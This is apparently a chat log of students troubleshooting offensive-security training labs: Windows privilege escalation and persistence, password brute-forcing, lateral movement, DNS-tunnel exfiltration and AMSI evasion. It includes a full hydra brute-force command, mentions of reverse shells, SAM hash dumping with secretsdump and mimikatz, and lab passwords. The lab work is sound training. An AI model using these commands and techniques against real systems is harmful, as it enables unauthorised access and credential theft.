but it isn't connecting
not with the hash with evil-winrm
not split view
with Password321
I'll redo it now. I know that thmuser3 hasn't had remote connection privileges
yeah... but I've changed the file...
got it!!!! thmuser3 flag done!!!!
finally connected!
nice!
what did you do different
I know I fcked up the first time because I didn't mark and replace the hex digits, so I've actually added some instead of replacing them.
maybe that's the reason
so if some of the mods or the creator can answer my question. Because the room is still resetting and I can't do anything
this one
helps more often than not
yeah... trying flag 4
after the reverse shell on flag4 should I be able to get the flag?
oh no... it's flag 5
Anyone having issues with task 4 in the windows privesc room? Netcat using both kali and attackbox doesn't want to connect, currently out of my house so I can't use my VM to see if it's a me issue or a step issue, and yes I did reread and restart the VM twice
Found the issue, might need to restart your attackbox/kali instance if using the online VM's
hi, made the changes but not getting a reverse shell, task 3, flag 6 win local persistence..
Don't worry about that. You'll just have to rejoin the room, but your progress won't be affected in any way. This is just a way to cope with inactive users hogging lab seats
You are changing the wrong progID. "textfile" != "txtfile"
OMG!!! thanks a lot!!!!
Gave +1 Rep to @echo ore
Did anyone have a big issue getting Armitage set up? It says it won't connect to the database, but I've verified that it is started. I'm on a fresh ubuntu OS.
@scarlet barn yeah man even after setup I had so many config errors, I ended up skipping that part lol
Gave +1 Rep to @twin tundra
I ended up with 535976... oh dear... what is the expected length of the clinic file?
^ This is for the result of using the rule in 'hints' for user burgess btw
I ^C'ed it after 15 minutes because it seemed a bit excessive and very likely because I did something wrong somewhere in there
upped the tasks to 64 simultaneous but nothing yet
oh my goodness... it was one real dumb mistake... welp
got it
hi people, I don't have permission to open flag9 on task 4 windows local persistence... any idea?
and can't delete the SD file
You need to open regedit as SYSTEM to delete those entries. You are probably just opening it as administrator, which is not enough
so I must repeat some task before it? because my time was off so I restarted the IP
all flags are independent, so you can go straight away for flag9
but, even if I don't erase that file, if I get a reverse shell, why shouldn't I get the flag?
Because you need to hide your task from the user, for which erasing the SD entry is a must. The flag executable is checking for that
understood. so after rdp as administrator Password321 i must become SYSTEM right?
yes, there are instructions on that in the task as well
OK thanks
Gave +1 Rep to @echo ore
ooohh that was because I was opening the registry editor from search and not from powershell with psexec, right?
that is correct!
FYI it's usually a better idea to install Ruby libraries via gem install, which will give you newer versions than what apt has.
Hi guys, anyone having problems using dig on Attackbox for the domain transfer task in the enumeration room? I always get "The term 'dig' is not recognized as the name of a cmdlet...."
hydra -l burgess -P burgess.txt 10.10.104.200 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
having a problem with the syntax
Please any help
isn't it supposed to be http-form-post?
I don't see any issue with the syntax
No, http-post-form is right
it is http-post-form.... missed that, it was the error
There wasn't an error, it wasn't connecting...... so I restarted the machine
Thanks guys
Hello mate, I'm trying to solve lateral movement and according to the instructions if you are using your personal computer you need to set the DNS and also set a default one. I'm confused as this is the first time I will be doing something like this, how do I get that done please? The picture above is what I have tried but it won't let me save it so I'm confused
How does your code look like to attack the burgess account? @naive sundial
Could someone kindly look into this for me, thanks
but if you are using Burp Suite you are doing something I cannot troubleshoot
I don't have experience with Burp for the moment
so maybe someone else can help
And this command is also not correct
I don't think so
because it is the intention you have a longer wordlist due to the single extra rule
it is still missing items
like /login-post/ should be /login-post/index.php
and on the end you should use S=logout.php instead of F= ..
I don't have them here, my Kali VM is at home
you should have a result in less than a minute
if it takes two minutes, it is already wrong
so you don't have to cross the complete wordlist
:Q
yes, I guess. But I'll try to configure it with something else
wait who are you? Bonzo = W4h33D?
No, wrong window lol
sorry, was writing why the pivoting network doesn't work, with another guy
Did you check the hint?
Yes
What seasons did you put as password?
I get no flag
Spring, Fall, Winter, Summer
So how is your password list looking like ?
DNS resolution keeps dropping on my Lateral Movement and Pivoting room... any experiencing this too? restarting the systemd-resolved service does the trick but it is kind of frustrating
Are you using your personal machine?
nope... AttackBox
Hello mate, I'm trying to use my own Kali, any idea how to configure the DNS?
I did... it works but once in a while it drops
and the file on the attackBox is /etc/systemd/resolved.conf
just add the DNS address to the DC under 'DNS=' as per the instructions
right but the instructions show the mods made to the other file
I omitted that part this time in reading though yeah... I was aware of that... it had just happened 2 or 3 times within the span of 5 minutes
yeah, I'll mess with the /etc/resolv.conf if it continues to do this
thanks @weak ice
Gave +1 Rep to @weak ice
can someone please help me with the room "Runtime Detection Evasion" on Task 7 - Patching AMSI? I get no flag on the desktop?! When I run the script, I get "true" as output in PowerShell. Please help!
True, but when I try to set it up I'm confused as I'm stuck here
@weak ice
hello, I have a problem in the enumeration room task 3 question 2, "what is the version number". I copied it from the attack box (I have the machine started and the attack box as they requested) and it's a wrong answer, any help?
picture?
In the "Intro to C2" room, I am trying to enable postgresql. I changed the "start" to "enable" and that enabled the server, the "preset" is still showing disabled. How do I enable that?
Task 4*
on the attackbox or on your own local kali VM???
My own Kali VM
oh okay dunno then
Task 8 in Password Attacks - the thing with login-post - I don't know what I am doing wrong but my attacks are very long - almost half an hour - could anyone help??
I have to restart my kali attack machine as it expired a second time
oh maybe this is the reason
Or you can just download the latest Kali?
I have had my fair share of issues with the attackbox
exfiltration => why can't I untar the file??
Lateral Movement and Pivoting room, exceptional room and information in there, great job @echo ore . And no problems finishing it at all. Either I'm learning windows or I'm lucky. A little slow though, especially using mimikatz. The last flag is easy to finish, but pretty hard to understand what's going on. Well explained though. I might become a windows fan after I finish that path
Glad you liked it! (also glad the lab didn't crash and burn for you). Two more AD labs to go
No, it worked really well and no resets
all of red team is pure gold!! Congrats to all the people who worked on it!!
Is Windows Privilege Escalation broken for task 6? Tried Attackbox, Kali, and VPN for impacket and all give me the following error
SAM hashes extraction failed: 'NoneType' object is not subscriptable
Maybe check the version of python you're using, pyenv can help you solve issues like this sometimes if you need a specific version for impacket
take screenshot
I tried python 3.9 which it stated but looking over the issue it appears that it is using the development version of impacket and not the 0.10.0 release, currently trying to figure out how to install the development release to see if it's a bug in 0.10.0 that was fixed in 0.10.1-dev
just secretsdump.py doesn't work?
from what I've tested so far, smbserver.py works without issue
yeah it's just the secretsdump.py
worked?
Ended up booting an ancient version of Parrot OS I had and it worked in there, no idea what is causing the issue on attackbox, kali, or my VM install
on my kali I had to erase the preinstalled impacket and download it again
by ancient I mean not updated in about 6-8 months and just moved the .hive files there
will give that a try and see if it resolves the issue
Did you install impacket through pip or just apt?
Will do, thank you!
Gave +1 Rep to @lucid plume
Hi!! I have problems with a theoretical question in the "windowsapi" room. I don't know the answer to "What type of method is used to reference the API call to obtain a struct?"
I've reviewed the previous parts of the room trying to understand it better but nothing.
I think if you reference the API call, you need a memory reference, no?
Task 7
Ok, I've already discovered it.... I knew the answer but it was a "lexical" problem
Nice
Spring2022@
Ok, general syntax would look right, so you probably just missing out the correct password in your list
So what I am missing out in the password list
Most likely the correct combination of season, year and special character
Mate I have tried all combinations of passwords
So what's your hydra command ?
Hydra -U username.txt -P password.txt ssh://127.0.0.1 -t5 -vv
-U is not right
Ok
Then what is the command
Check the task
Haha. Finally found the last two passwords. The room encourages you to follow it exactly and not try to think by yourself :/ || the login failure message does appear in the successful login as well and is not usable for F= ||
I have some questions about Data exfiltration, Task 10 DNS tunneling, i get a connection over iodine, ssh. But accessing the homepage gives me thm@attacker:~$ curl --socks5 127.0.0.1:1080 http://192.168.0.100/test.php channel 1: open failed: connect failed: Connection refused curl: (7) Failed to receive SOCKS5 connect request ack.
which task?
Task 10
tcp 0 0 127.0.0.1:1080 0.0.0.0:* LISTEN 49/ssh The connection is established, on the attacker
which room?
Theoretically, if I wanted to cheat, I could access the homepage from the jump box ?
I have some questions about Data exfiltration, Task 10 DNS tunneling,
issue with the windows persistence room where the RDP session returns a black screen after logging in and out multiple times. Making parts of the persistence-through-logon task not solvable https://tryhackme.com/room/windowslocalpersistence
sorry man, I didn't do it, can't help
just reporting it lol
worked for me, try restart the box, or use remmina .
Restart and recreate the tunnel solved the problem
using remmina in place of rebooting to double check that xfreerdp was broken still returned black screen...
restart is everything!! XD
ah, bad. The room works though. Only don't know how to make it work for you
fix it by rebooting, not resetting
anyways
done
Power it off and power it on again works in 90 % of the cases. Where are you now with the rooms @lucid plume ? How far did you get ?
Doing Abusing Windows Internals, almost finishing...
Anyone have any advice on Task 2 for Signature Evasion.
N00b question but copying and pasting msfvenom output from the attackbox to the windows VM is not working, any suggestions?
Weaponization room
By not working, do you mean you can't paste it?
Correct
hmm, that is done
You should now be able to copy and paste between your host and the attackbox
ahh, I can do that, however, I can't paste into the windows VM. So attackbox to host works, but attackbox to windows VM or host to windows VM does not
Is that full screen too?
Yeah both attackbox and windows vm are full screen